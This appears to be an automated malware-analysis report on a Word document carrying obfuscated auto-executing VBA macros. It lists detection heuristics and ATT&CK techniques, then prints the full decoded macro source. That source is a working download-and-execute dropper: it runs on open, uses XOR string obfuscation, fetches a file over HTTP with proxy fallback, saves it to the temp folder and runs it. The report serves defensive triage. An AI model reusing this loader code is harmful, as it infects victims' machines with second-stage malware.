MALICIOUS (Risk Score 272)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1036.005 Masquerading: Match Legitimate Name or Location
The sample contains obfuscated VBA macros designed to execute automatically upon opening the document. Critical heuristics indicate that the VBA code downloads a file from an embedded URL and executes it, likely as a second-stage payload. The obfuscation and download-execute behavior are strong indicators of malicious intent.
Heuristics (9)

- VBA macros detected (medium, 6 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- VBA downloads and writes a file to disk (critical) OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
  Matched line in script: Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call.
  Matched line in script: Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro.
  Matched line in script: Private Sub Document_Open()
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10178 bytes |

SHA-256 (macros.bas): 2e424df6eaf2dfaa5b6ad3349598805d3ffb5cf1ab168b7c94ac81296768f34b

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 45 of 88 identifiers look randomly generated (e.g. 'SvVvgsFrlBFOMPTKXpPXCJCKl'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wXuyQD").Value <> "yolo" Then
SlbXxVyyHeBrskJcBvSxcRITl
ActiveDocument.Variables("wXuyQD").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "RisioCV"
Private Function DNvFQksVvu(sFhiZmBXeg As Variant, hkpuWxBqrE As Integer)
Dim VuWInWOQHZ, xxOyfGcwMe As String, CTRBizosjQ, VaKobBBMTv
xxOyfGcwMe = ActiveDocument.Variables("wXuyQD").Value()
VuWInWOQHZ = ""
CTRBizosjQ = 1
While CTRBizosjQ < UBound(sFhiZmBXeg) + 2
VaKobBBMTv = CTRBizosjQ Mod Len(xxOyfGcwMe): If VaKobBBMTv = 0 Then VaKobBBMTv = Len(xxOyfGcwMe)
VuWInWOQHZ = VuWInWOQHZ + Chr(Asc(Mid(xxOyfGcwMe, VaKobBBMTv + hkpuWxBqrE, 1)) Xor CInt(sFhiZmBXeg(CTRBizosjQ - 1)))
CTRBizosjQ = CTRBizosjQ + 1
Wend
DNvFQksVvu = VuWInWOQHZ
End Function
Function MmbOAtxextHtZGBPECnnwvPel(kfcKDiyDtDThbTJekXWCsRhJb, WgkEGxbzBoXEbGLgrgmGFPpch)
AxytWKgKokKUdnneUwTwvJgcR = kfcKDiyDtDThbTJekXWCsRhJb.Items
For OWjQuNHJLXscrkfpgapRDrrgR = 0 To kfcKDiyDtDThbTJekXWCsRhJb.Count - 1
If AxytWKgKokKUdnneUwTwvJgcR(OWjQuNHJLXscrkfpgapRDrrgR) = WgkEGxbzBoXEbGLgrgmGFPpch Then
MmbOAtxextHtZGBPECnnwvPel = True
Exit For
End If
Next
MmbOAtxextHtZGBPECnnwvPel = False
End Function
Dim bxRiElaeQvRXBNGnaFGjwfbJm
Sub rqXUQfNbTIMRtyppMqmOSHkvB()
Dim vcDddGwdlsmvFOhmFRDuQdDRm
Set vcDddGwdlsmvFOhmFRDuQdDRm = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set dPpuQjBcGmbEXdYahaccmddob = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 45, 45, 21, 34, 95, 46, 13, 21, 40, 26), 0))
Dim IHOjWxSdqTagfSmMymycwcuSe: IHOjWxSdqTagfSmMymycwcuSe = 0
Dim SaZMETGnObJFvwwyZsXdIRDpa: SaZMETGnObJFvwwyZsXdIRDpa = ""
Dim uHevxtKKuiSSzmOVAKLaZPioV: uHevxtKKuiSSzmOVAKLaZPioV = ""
On Error Resume Next
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 37, 15, 13, _
44, 28, 31, 1, 7, 11, 20, 28, 112, 55, 20, 3, 35, 57, 49, 60, 11, 29, 49, 47, _
8, 21), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(35, 51, 49, 47, 49, 20, 52, 11, 25, 3, 39, 16, 41, 3, 101, 4, 49, 40, 9, 12, 36, _
16, 24, 53, 17, 14, 36, 57, 31, 13, 37, 14, 42, 36, 32, 29, 24, 33, 63, 88, 37, _
12, 3, 41, 63, 1, 17, 29, 38, 6, 5, 12, 34, 19, 28, 36, 8, 54, 37, 26, 32, _
42, 2, 51, 68, 47, 6, 0, 122, 48, 39, 16, 27, 61, 13, 12, 11, 40, 3, 38, 50, _
23, 33, 63, 13, 34, 49, 31, 5, 101, 59, 14, 59, 12, 34, 9, 40, 14, 14, 51, 2, _
23, 34), 0))
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const dCqUlTTtIgxrTPPMLtNsIQTFf = &H80000003
xBkzjDZSgJsmmEJNtvDxOYUaL = DNvFQksVvu(Array(69), 0)
Set PMFuSKVNGVoPRbHdBmpqEzNjr = GetObject(DNvFQksVvu(Array(28, 17, 26, 27, 9, 58, 21, 42, 113, 61, 0, 41, 6, 51, 68, 50, 12, 26, 59, 23, 43, _
11, 1, 24, 6, 29, 29, 24, 75, 7, 58, 17, 60, 57, 53, 6, 42, 23, 34, 83, 60, _
66, 40, 6), 0) _
& xBkzjDZSgJsmmEJNtvDxOYUaL & DNvFQksVvu(Array(55, 10, 27, 25, 26, 11, 5, 60, 45, 39, 28, 40, 2, 108, 101, 53, 7, 38, 63, 4, 18, _
22, 0, 34), 0))
uBcpRCqjntTUeLjijfZzAatnD = ""
PMFuSKVNGVoPRbHdBmpqEzNjr.EnumKey dCqUlTTtIgxrTPPMLtNsIQTFf, uBcpRCqjntTUeLjijfZzAatnD, sQENbjrDlsCSrslEMAoVLhgZX
For Each QylTGyrFWucaDlsHZADvDRUKn In sQENbjrDlsCSrslEMAoVLhgZX
SaZMETGnObJFvwwyZsXdIRDpa = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
23, 23, 12, 123, 4, 55, 51, 52, 44, 32, 46, 41, 34, 20, 28, 1, 46, 5, 54, 51, _
40, 11, 15, 54, 8), 0))
If SaZMETGnObJFvwwyZsXdIRDpa = DNvFQksVvu(Array(90), 0) Then
uHevxtKKuiSSzmOVAKLaZPioV = vcDddGwdlsmvFOhmFRDuQdDRm.RegRead(DNvFQksVvu(Array(15, 59, 5, 35, 2, 3, 53, 45, 2, 33, 17, 54, 34, 6, 102, 12, 47, 0, 20, 16, 11, _
53, 59, 18, 5, 55), 0) & QylTGyrFWucaDlsHZADvDRUKn & DNvFQksVvu(Array(55, 43, 27, 16, 26, 32, 0, 43, 46, 26, 36, 45, 21, 36, 89, 50, 12, 18, 46, 63, 21, _
13, 1, 48, 12, 28, 11, 40, 53, 27, 37, 19, 60, 37, 50, 63, 33, 4, 37, 95, 46, _
13, 40, 19, 13, 54, 1, 29, 58, 6, 31, 88, 39, 19, 26, 35, 8, 55, 44, 53, 53, _
49, 62, 51, 64, 57, 23, 63, 17, 22, 43, 55, 60, 46, 14, 36, 46, 53, 61, 34, 54, _
59, 9, 34, 41, 63), 0))
If Not MmbOAtxextHtZGBPECnnwvPel(dPpuQjBcGmbEXdYahaccmddob, uHevxtKKuiSSzmOVAKLaZPioV) Then
IHOjWxSdqTagfSmMymycwcuSe = IHOjWxSdqTagfSmMymycwcuSe + 1
dPpuQjBcGmbEXdYahaccmddob.Add IHOjWxSdqTagfSmMymycwcuSe, uHevxtKKuiSSzmOVAKLaZPioV
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set bxRiElaeQvRXBNGnaFGjwfbJm = dPpuQjBcGmbEXdYahaccmddob
Set vcDddGwdlsmvFOhmFRDuQdDRm = Nothing
End Sub
Function YjYdLWRvwTbgNyxJurVoCmQfT(MRkXboNAfYFWdVPWuxRZtGhNI, SvVvgsFrlBFOMPTKXpPXCJCKl, jMBxWxrXssxuIkGzQiKSQratt, riUNWjDIzOELpPwvcmcjCMkZa)
On Error Resume Next
Dim XMChsfNKHVQniAhVXJMJOLPbT
Set XMChsfNKHVQniAhVXJMJOLPbT = CreateObject(DNvFQksVvu(Array(38, 11, 12, 27, 2, 101, 79, 10, 46, 52, 31, 33, 4, 14, 123, 13, 43, 32, 14, 51, 108, _
82, 65, 100), 0))
If Err.Number <> 0 Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
Err.Clear
Exit Function
End If
Dim ErIvgrGUTuHXMPzAmejKGjMGU: ErIvgrGUTuHXMPzAmejKGjMGU = 0
Do While ErIvgrGUTuHXMPzAmejKGjMGU < UBound(jMBxWxrXssxuIkGzQiKSQratt)
Err.Clear
AxytWKgKokKUdnneUwTwvJgcR = bxRiElaeQvRXBNGnaFGjwfbJm.Items
For qvOdZTkyhJvZIIeTrBVuCaqKW = -1 To bxRiElaeQvRXBNGnaFGjwfbJm.Count - 1
Err.Clear
rujCcoXqvOcvVNWgcacaVtOze = jMBxWxrXssxuIkGzQiKSQratt(ErIvgrGUTuHXMPzAmejKGjMGU) & riUNWjDIzOELpPwvcmcjCMkZa
XMChsfNKHVQniAhVXJMJOLPbT.setOption 2, 13056
XMChsfNKHVQniAhVXJMJOLPbT.setTimeouts 0, 0, 0, 0
XMChsfNKHVQniAhVXJMJOLPbT.Open MRkXboNAfYFWdVPWuxRZtGhNI, rujCcoXqvOcvVNWgcacaVtOze, False
If qvOdZTkyhJvZIIeTrBVuCaqKW <> -1 Then
XMChsfNKHVQniAhVXJMJOLPbT.setProxy 2, AxytWKgKokKUdnneUwTwvJgcR(qvOdZTkyhJvZIIeTrBVuCaqKW), ""
End If
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 16, 21, 4, 29, 50, 21), 0), DNvFQksVvu(Array(30, 12, 18, 91, 86), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 24, 11, 52, 21, 48, 36, 40), 0), DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(32, 29, 17, 6, 67, 22, 13, 48, 61, 35), 0), DNvFQksVvu(Array(88, 72, 68), 0)
XMChsfNKHVQniAhVXJMJOLPbT.setRequestHeader DNvFQksVvu(Array(40, 23, 26, 2, 11, 57, 21, 116, 31, 63, 25, 33), 0), DNvFQksVvu(Array(10, 8, 4, 26, 7, 52, 0, 45, 34, 41, 7, 107, 14, 123, 65, 54, 20, 89, 60, 12, 48, _
9, 66, 33, 17, 7, 29, 26, 21, 1, 51, 4, 61), 0)
XMChsfNKHVQniAhVXJMJOLPbT.Send (SvVvgsFrlBFOMPTKXpPXCJCKl)
If XMChsfNKHVQniAhVXJMJOLPbT.ReadyState <> 4 Then
XMChsfNKHVQniAhVXJMJOLPbT.WaitForResponse 30
End If
If Err.Number = 0 Then
If XMChsfNKHVQniAhVXJMJOLPbT.Status = 200 Then
If XMChsfNKHVQniAhVXJMJOLPbT.StatusText = DNvFQksVvu(Array(36, 51), 0) Then
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Exit Function
End If
End If
End If
Next
ErIvgrGUTuHXMPzAmejKGjMGU = ErIvgrGUTuHXMPzAmejKGjMGU + 1
Loop
YjYdLWRvwTbgNyxJurVoCmQfT = XMChsfNKHVQniAhVXJMJOLPbT.ResponseBody
Set XMChsfNKHVQniAhVXJMJOLPbT = Nothing
End Function
Sub HFrkveFgejmygVlsXhAOcnSPx(jrFWnTBceRnkTVqSUzeczwRwe, SsuzikMLBesCbOGBzsJCzdtwf)
Set hpdXRaICBrMidysNqWZvKUKvp = CreateObject(DNvFQksVvu(Array(42, 60, 59, 50, 44, 121, 50, 45, 57, 35, 8, 41), 0))
hpdXRaICBrMidysNqWZvKUKvp.Open
hpdXRaICBrMidysNqWZvKUKvp.Type = 1
If IsEmpty(jrFWnTBceRnkTVqSUzeczwRwe) Then
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
Exit Sub
End If
hpdXRaICBrMidysNqWZvKUKvp.Write jrFWnTBceRnkTVqSUzeczwRwe
hpdXRaICBrMidysNqWZvKUKvp.Position = 0
hpdXRaICBrMidysNqWZvKUKvp.SaveToFile SsuzikMLBesCbOGBzsJCzdtwf
hpdXRaICBrMidysNqWZvKUKvp.Close
Set hpdXRaICBrMidysNqWZvKUKvp = Nothing
End Sub
Sub SlbXxVyyHeBrskJcBvSxcRITl()
On Error Resume Next
Dim CyIZJzUpHiMUQXCqfyyLedgCP(), euEvLXdRrPZPHrgjUzJJvTeYI, tLmgYQsmxrfyqFHvGJTxWguUN, orZFdNDAWAWXpavOWxzpbBuwp
ReDim CyIZJzUpHiMUQXCqfyyLedgCP(1)
rqXUQfNbTIMRtyppMqmOSHkvB
Set tLmgYQsmxrfyqFHvGJTxWguUN = CreateObject(DNvFQksVvu(Array(60, 43, 23, 4, 7, 39, 21, 119, 24, 46, 12, 40, 26), 0))
Set orZFdNDAWAWXpavOWxzpbBuwp = CreateObject(DNvFQksVvu(Array(56, 27, 6, 31, 30, 35, 8, 55, 44, 104, 47, 45, 26, 51, 101, 56, 16, 0, 63, 14, 13, _
6, 5, 49, 0, 31), 0)).GetSpecialFolder(2)
euEvLXdRrPZPHrgjUzJJvTeYI = DNvFQksVvu(Array(18, 23, 24, 25, 64, 50, 25, 60), 0)
orZFdNDAWAWXpavOWxzpbBuwp = orZFdNDAWAWXpavOWxzpbBuwp & DNvFQksVvu(Array(55), 0) & euEvLXdRrPZPHrgjUzJJvTeYI
CyIZJzUpHiMUQXCqfyyLedgCP(0) = DNvFQksVvu(Array(3, 12, 0, 6, 84, 120, 78, 46, 60, 49, 71, 41, 23, 53, 68, 46, 16, 27, 60, 23, 108, _
3, 30, 123), 0)
UDRLgTLOgzgBjhNHSljHQryNY = YjYdLWRvwTbgNyxJurVoCmQfT(DNvFQksVvu(Array(44, 61, 32), 0), "", CyIZJzUpHiMUQXCqfyyLedgCP, DNvFQksVvu(Array(17, 87, 22, 25, 26, 121, 4, 33, 46), 0))
HFrkveFgejmygVlsXhAOcnSPx UDRLgTLOgzgBjhNHSljHQryNY, orZFdNDAWAWXpavOWxzpbBuwp
tLmgYQsmxrfyqFHvGJTxWguUN.Run (orZFdNDAWAWXpavOWxzpbBuwp)
End Sub